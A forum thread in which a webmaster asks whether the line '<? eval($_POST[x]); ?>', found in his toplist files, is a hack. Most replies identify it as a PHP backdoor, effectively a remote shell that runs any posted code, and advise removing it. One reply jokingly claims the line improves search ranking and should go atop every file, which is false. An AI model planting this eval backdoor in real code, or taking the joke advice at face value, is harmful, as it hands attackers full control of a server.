<? eval($_POST[x]); ?> is this a hack?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • zentz
    Confirmed User
    • Nov 2003
    • 8062

    #1

    <? eval($_POST[x]); ?> is this a hack?

    i found this in my toplist files

    <? eval($_POST[x]); ?>

    what is that? a hack?
    Programs that owe me money ---- Epassporte.com ~ $2700 | Protraffic.com ~ $2600 | XonDemand.com ~ $3000

    Email: [email protected]
  • seeandsee
    Check SIG!
    • Mar 2006
    • 50945

    #2
    bump for php wizards
    BUY MY SIG - 50$/Year

    Contact here

    Comment

    • Angry Jew Cat - Banned for Life
      (felis madjewicus)
      • Jul 2006
      • 20368

      #3
      hax teh planet

      Comment

      • ScriptWorkz
        Confirmed User
        • Jul 2007
        • 274

        #4
        Most likely, it executes whatever code is in the post variable 'x' as php, so if someone posted some malicious php code it could be pretty bad depending on how your server is configured.

        I don't really see any real point in having that in there and would most likely remove it unless you know it's used for something and even then i'd find a way to replace that functionality w/o something that didn't leave such a big security hole.

        Comment

        • Linguist
          Confirmed User
          • Apr 2004
          • 1706

          #5
          That code CANNOT be used for anything good, period.

          If your toplist stops working after removing that line, find another piece of software to replace it, no programmer with half a clue would include that code.
          315-310

          Comment

          • HomerSimpson
            Too lazy to set a custom title
            • Sep 2005
            • 13826

            #6
            yes it is...
            it can run any command attacker wants...
            Make a bank with Chaturbate - the best selling webcam program
            Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!!

            PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 | Email:

            Comment

            • u-Bob
              there's no $$$ in porn
              • Jul 2005
              • 33063

              #7
              It's evil.

              Comment

              • TeenCat
                Too lazy to set a koala
                • Jan 2007
                • 16139

                #8
                "insert shell here"

                6bot
                / Coming again very soon!
                Svit Zlin Radio 24/7!

                Comment

                • V_RocKs
                  Damn Right I Kiss Ass!
                  • Nov 2003
                  • 32449

                  #9
                  That is indeed "a hack"... Remote shell... Allows anyone to execute code as the user apache is running as. Usually "nobody".

                  What can it be used for?

                  select * from users;

                  among other things...

                  Comment

                  • Killswitch - BANNED FOR LIFE

                    #10
                    heh, remove it, asap.

                    Comment

                    • SmokeyTheBear
                      ►SouthOfHeaven
                      • Jun 2004
                      • 28609

                      #11
                      thats the secret google priority code, you should place it on the top of every file for better search engine ranking
                      hatisblack at yahoo.com

                      Comment

                      Working...